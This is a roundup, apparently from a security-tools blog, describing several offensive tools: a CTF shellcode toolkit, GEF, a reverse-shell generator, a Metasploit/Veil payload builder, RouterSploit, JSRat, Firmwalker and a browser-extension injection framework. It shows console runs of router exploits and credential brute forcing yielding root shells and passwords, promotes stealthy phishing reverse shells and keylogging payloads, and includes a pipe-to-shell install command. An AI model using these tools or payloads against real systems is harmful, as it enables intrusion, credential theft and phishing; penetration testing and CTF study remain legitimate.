Security CTF Toy Tools - v0lt

v0lt is an attempt to regroup every tool I used/use/will use in security CTF, Python style. A lot of exercises were solved using bash scripts but Python may be more flexible, that's why. Nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only.

Requirements and Installation

Dependencies:

• Libmagic
• Python3
  • BeautifulSoup
  • Requests
  • filemagic
  • hexdump
  • passlib

Installation:

# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies

Demo: Shellcodes

>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellHack(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)

...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...

Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"

>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}

Implemented:

• Crypto
  
  • Base64
  • Ceasar shift
  • Hashing functions (SHA, MD5)
  • Bits manipulations (XOR, inverse XOR)
  • Usual conversions (bytes, strings, hex)
  • RSA basics (inverse modulo, inverse power, egcd...)
  • Bruteforcing (Dictionnary, custom word)
• Shellcodes
  
  • Shellcode selection and download from Shell-storm repo
  • Shellcode formater
  • Shell{cat,net}: Sending shellcode made easy
  • Automatic padding
• Easy connection support
  
  • Netcat
  • Telnet

And more Examples are available here

Changelog

Only includes major features and changes. Bugfixes and minor changes are omitted.

1.3

• Lots of fixes again
• Hexeditor (Dump/Rewrite files)
• Unix password bruteforce cracker

1.2

• Lots of documentation/bugs/framework fixes
• Added bruteforce
• Added linux utils
• Began hexeditor
• Shellhack fixes
• Alert messages

1.0

• Lots of documentation fixes
• Lots of bugfixes
• Added shellhack (shellcodes stuff)
• Added crypto utils
• Added network utils
• Fixed project tree

Download V0Lt

Read More

Multi-Architecture GDB Enhanced Features for Exploiters & Reverse-Engineers - GEF

GEF is aimed to be used mostly by exploiters and reverse-engineers. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis or exploit development.

GEF fully relies on GDB API and other Linux specific source of information (such as /proc/pid ). As a consequence, some of the features might not work on custom or harden systems such as GrSec. It has fully support for Python2 and Python3 indifferently (as more and more distro start pushing gdb compiled with Python3 support).

Quick start

Simply make sure you're having a GDB 7.x+ .

 $ wget -q -O- https://github.com/hugsy/gef/raw/master/gef.sh | sh

Then just start playing (for local files):

$ gdb -q /path/to/my/bin
gef> gef help

Or (for remote debugging)

remote:~ $ gdbserver 0.0.0.0:1234 /path/to/file 

And

local:~ $ gdb -q
gef> gef-remote your.ip.address:1234

Show me

x86

ARM

PowerPC

MIPS

Dependencies

There are none: GEF works out of the box! However, to enjoy all the coolest features, it is recommended to install:

• capstone highly recommended
• ROPgadget highly recommended

Note : if you are using GDB with Python3 support, you cannot use ROPgadget as Python3 support has not implemented yet. Capstone and radare2-python will work just fine.
Another note : Capstone is packaged for Python 2 and 3 with pip . So a quick install is

$ pip2 install capstone    # for Python2.x
$ pip3 install capstone    # for Python3.x

And same goes for ropgadget



$ pip[23] install ropgadget

The assemble command relies on the binary rasm2 provided by radare2 .

Download GEF

Read More

Script to collect information to the client side - GetDataReport

Script in PHP+JS for get information of target through a web application, use $_SERVER functions and JS functions for get information of our client.

Plugin (WEBApps)

in some web applications need to collect information from the client to perform tasks with this plugin will be easier to work with the variables you need.

<?php

include("GetdataReport.Plugin.php");
$data = new GetDataPlugin();

echo "<br>IP               ".$data->ip();
echo "<br>Operative System ".$data->os();
echo "<br>Browser          ".$data->browser();
echo "<br>Screen height    ".$data->height();
echo "<br>Screen width     ".$data->width();
echo "<br>Java enabled     ".$data->javaenabled();
echo "<br>Cookie enabled   ".$data->cookieenabled();
echo "<br>Language         ".$data->language();
echo "<br>Architecture     ".$data->architecture();
echo "<br>Device           ".$data->device();
echo "<br>Country          ".$data->geo('country');
echo "<br>Region           ".$data->geo('region');
echo "<br>Continent        ".$data->geo('continent');
echo "<br>City             ".$data->geo('city');
echo "<br>Logitude         ".$data->geo('logitude');
echo "<br>Latitude         ".$data->geo('latitude');
echo "<br>Currency         ".$data->geo('currency');
echo "<br>Provetor         ".$data->provetor();
echo "<br>Agent            ".$data->agent();
echo "<br>Referer          ".$data->referer();
echo "<br>Date             ".$data->getdate();


 ?>

Hack (Social engineering)

With this script we can collect information from a target performing a routing and generating an html page report.

        HTTP://127.0.0.1/GetdataReport.php?id=any&j=yes&url=google.com

Download GetDataReport

Read More

An interactive reference tool to help security professionals utilize useful payloads and commands - Brosec

Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.

Assuming the user has already set up the required variables (read on to learn how) a reverse shell using the awk command can be generated as easy as...

Payload Variables

Brosec allows you to store and retrieve values (in a local json db) for several variables in order to make command/payload generation easier. While some payloads will already include these variables, you can also include them in any payload that prompts for user input.

For example, the following shows how a Powershell download cradle can be generated using the LHOST and LPORT variables (the values of which had already been set).

Available variables

• LHOST : Local IP or name
• LPORT : Local IP or name
• RHOST : Remote IP or name
• RPORT : Remote IP or name
• USER : Username (only used in a few payloads)
• PROMPT : User Prompt (This isn't a stored value. Instead, payloads with this variable will prompt for input.)

Above are multiple examples of how to access and set the stored configuration variables.

• Configuration variables can be viewed via the config command at any time, or by entering the variable name
• Variables can be changed at any time by entering set <variable> <value>
• You can also navigate to frequently used payloads by entering the menu sequence from the command line: bros <sequence>
  • Ex: bros 413 - This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload

Additional Features and Usage Examples

XXE for Bros

In addition to payloads such as reverse shells, Brosec also has multiple XXE payloads that you can generate on the fly.

Simple HTTP(s) Server

Need a quick web server? Forget python SimpleHTTPServer, bros has your back with bros http when entered via the command line. An SSL server? bros https has you covered.

Anonymous FTP Server

Need to exfiltrate some data via ftp? Bros comes with a handy bros ftp when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running).

Installation

Releases
Some features are unavailable in the compiled version, but is a good way to quickly try out Brosec

Manual installation

Mac

• brew install node netcat - Install Nodejs and netcat (nc or ncat will work too)
• git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
• cd Brosec && npm install - cd into the directory and install npm depdendencies

Kali Linux

• apt-get install npm build-essential g++ xsel netcat Install dependencies
• npm config set registry http://registry.npmjs.org/ Npm registry seems to be broken by default when installed from Kali repos
• npm install -g n Install n (nodejs version manager)
• n latest Install latest version of nodejs
• git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
• cd Brosec && npm install - cd into the directory and install npm depdendencies

Windows (Unsupported)

• Install nodejs
• Install ncat
• git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo

Payloads that utilize netcat will not work due to the kexec library not being supported in Windows

Optional

Add bros directory path to your PATH env variable, create a symlink for the bros file, etc

Configuration

Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Brosec also uses netcat for several payloads. If needed, the path to netcat can be altered via the settings.netcat variable (it can also be changed to ncat or nc).

Download Brosec

Read More

Payload generator that uses Metasploit and Veil - Payday

Payload generator that uses Metasploit and Veil. Takes IP address input and then builds payloads automatically. Calls Veil framework with supplied IP address and creates binaries and handlers. Uses msfvenom to create payloads and writes resource handler files in the same way that Veil does.

Examples:

Generate Metasploit Payloads

payday.py --msf --ip 1.1.1.1

Generate Veil Payloads

payday.py --veil --ip 1.1.1.1

Generate Both

payday.py --veil --msf --ip 1.1.1.1

Clean Out Directories

payday.py --clean

Specify custom output directory

payday --veil --msf --output /path/to/custom --ip 1.1.1.1

Clean custom output directory

payday --output /path/to/custom --clean

Download Payday

Read More

Router Exploitation Framework - RouterSploit

The RouteSploit Framework is an open-source exploitation framework dedicated to embedded devices.
It consists of various modules that aids penetration testing operations:

• exploits - modules that take advantage of identified vulnerabilities
• creds - modules designed to test credentials against network services
• scanners - modules that check if target is vulnerable to any exploit

Installation

sudo apt-get install python-requests python-paramiko python-netsnmp
git clone https://github.com/reverse-shell/routersploit
./rsf.py

Usage

root@kalidev:~/git/routersploit# ./rsf.py 
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
     Router Exploitation Framework   |_|

 Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
 Codename : Wildest Dreams
 Version  : 1.0.0

rsf > 

1. Exploits

Pick the module

rsf > use exploits/
exploits/2wire/     exploits/asmax/     exploits/asus/      exploits/cisco/     exploits/dlink/     exploits/fortinet/  exploits/juniper/   exploits/linksys/   exploits/multi/     exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) > 

U can use tab key for completion.

Options

Display module options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target Port

Set options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1
[+] {'target': 'http://192.168.1.1'}

Run module

Exploiting target can be achieved by issuing 'run' or 'exploit' command:

rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root

It is also possible to check if the target is vulnerable to particular exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable

Info

Display information about exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show info

Name:
D-LINK DIR-300 & DIR-600 RCE

Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.

Targets:
- D-Link DIR 300
- D-Link DIR 600

Authors:
- Michael Messner <devnull[at]s3cur1ty.de> # vulnerability discovery
- Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module

References:
- http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
- http://www.s3cur1ty.de/home-network-horror-days
- http://www.s3cur1ty.de/m1adv2013-003

2. Creds

Pick module

Modules located under creds/ directory allow running dictionary attacks against various network services.
Following services are currently supported:

• ftp
• ssh
• telnet
• http basic auth
• http form auth
• snmp

Every service has been divided into two modules:

• default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. Module can be quickly used and in matter of seconds verify if the device uses default credentials.
  
• bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against specified account or list of accounts. It takes two parameters login and password. These values can be a single word (e.g. 'admin') or entire list of strings (file:///root/users.txt).

Console:

rsf > use creds/
creds/ftp_bruteforce         creds/http_basic_bruteforce  creds/http_form_bruteforce   creds/snmp_bruteforce        creds/ssh_default            creds/telnet_default         
creds/ftp_default            creds/http_basic_default     creds/http_form_default      creds/ssh_bruteforce         creds/telnet_bruteforce      
rsf > use creds/ssh_default
rsf (SSH Default Creds) > 

Options

rsf (SSH Default Creds) > show options

Target options:

   Name       Current settings     Description           
   ----       ----------------     -----------           
   target                          Target IP address     
   port       22                   Target port           


Module options:

   Name         Current settings                                                      Description                                              
   ----         ----------------                                                      -----------                                              
   threads      8                                                                     Numbers of threads                                       
   defaults     file:///root/git/routersploit/routersploit/wordlists/defaults.txt     User:Pass or file with default credentials (file://)

Set target:

rsf (SSH Default Creds) > set target 192.168.1.53
[+] {'target': '192.168.1.53'}

Run module

rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'

(..)

Elapsed time:  38.9181981087 seconds
[+] Credentials found!

Login     Password     
-----     --------     
admin     1234         

rsf (SSH Default Creds) > 

3. Scanners

Scanners allow quickly verify if the target is vulnerable to any exploits.

Pick module

rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options

Options

Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target port                                

Set target:

rsf (D-Link Scanner) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}

Run module

rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
 - exploits/dlink/dwr_932_info_disclosure

It has been verified that target is vulnerable to dwr_932_info_disclosure exploit. Now use proper module and exploit target.

rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success

   Parameter                  Value                                                                                                 
   ---------                  -----                                                                                                 
   get_wps_enable             0                                                                                                     
   wifi_AP1_enable            1                                                                                                     
   get_client_list            9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0     
   wifi_AP1_ssid              dlink-DWR-932                                                                                         
   get_mac_address            c4:00:f5:00:ec:40                                                                                     
   wifi_AP1_security_mode     3208,8                                                                                                
   wifi_AP1_hidden            0                                                                                                     
   get_mac_filter_switch      0                                                                                                     
   wifi_AP1_passphrase        MyPaSsPhRaSe                                                                                          
   get_wps_mode               0

Download RouterSploit

Read More

Reverse HTTP Shell Using JavaScript - JSRat

JSRat is a reverse HTTP Shell by using JavaScript. JSRat use rundll32.exe to load the JavaScript code in cmd and a HTTP Shell is returned when the code is executed. The special part is that after running the cmd command, rundll32.exe will remain in the background to continuously connect to the Server. No file is written to the disk during the whole process, which significantly enhances stealth.

Characteristics:

To reverse a shell by using cmd to execute codes

Advantages:

• It can avoid being killed
• It’s easy to use
• It’s relatively stealthy.

Exploitation:

Based its characteristics and advantages, using JavaScript as the phishing payload can achieve amazing effect.

Download JSRat

Read More

Script for searching the extracted firmware file system for goodies! - Firmwalker

A simple bash script for searching the extracted or mounted firmware file system.

It will search through the extracted or mounted firmware file system for things of interest such as:

• etc/shadow and etc/passwd
• list out the etc/ssl directory
• search for SSL related files such as .pem, .crt, etc.
• search for configuration files
• look for script files
• search for other .bin files
• look for keywords such as admin, password, remote, etc.
• search for common web servers used on IoT devices
• search for common binaries such as ssh, tftp, dropbear, etc.
• search for URLs, email addresses and IP addresses
• NOTE: Some of the data written to the file may be quite verbose. It that case, the data can be reviewed and then deleted if desired from the file.

Usage

• If you wish to use the static code analysis portion of the script, please install eslint: npm i -g eslint
• ./firmwalker {path to root file system} {path for firmwalker.txt}
• Example: ./firmwalker linksys/fmk/rootfs ../firmwalker.txt
• A file firmwalker.txt will be created in the same directory as the script file unless you specify a different filename as the second argument
• Do not put the firmwalker.sh file inside the directory to be searched, this will cause the script to search itself and the file it is creating
• chmod 0700 firmwalker.sh

How to extend

• Have a look under 'data' where the checks live or add eslint rules - http://eslint.org/docs/rules/ to eslintrc.json

Script created by Craig Smith and expanded by:

• Athanasios Kostopoulos
• misterch0c

Links

• https://craigsmith.net
• https://woktime.wordpress.com
• https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=Firmware_Analysis

Download Firmwalker

Read More

Extension Exploitation Framework - LynxFramework

LynxFramework is an operating tool for web browser offering a specialized service in the effect browser extension development , namely Google Chrome and Firefox soon. The operation is based on the script for the injection in the order to retrieve data targeted.

LynxFramework est un outil d'exploitation pour navigateur web vous proposant un service d'effet specialise dans le developpement d'extension pour navigateur, a savoir Google Chrome et prochainement Firefox. Le fonctionnement est base sur l'injection de script dans l'extension afin de recuperer des donnees ciblees.

 

LAST ONLINE PAYLOAD

XSSKeylooger	keylooger xss
ForceDownload	force file download
paytoweb	www.paytoweb.com
Paypal	https://www.paypal.com/signin/
Facebook	http://facebook.com

Download LynxFramework

Read More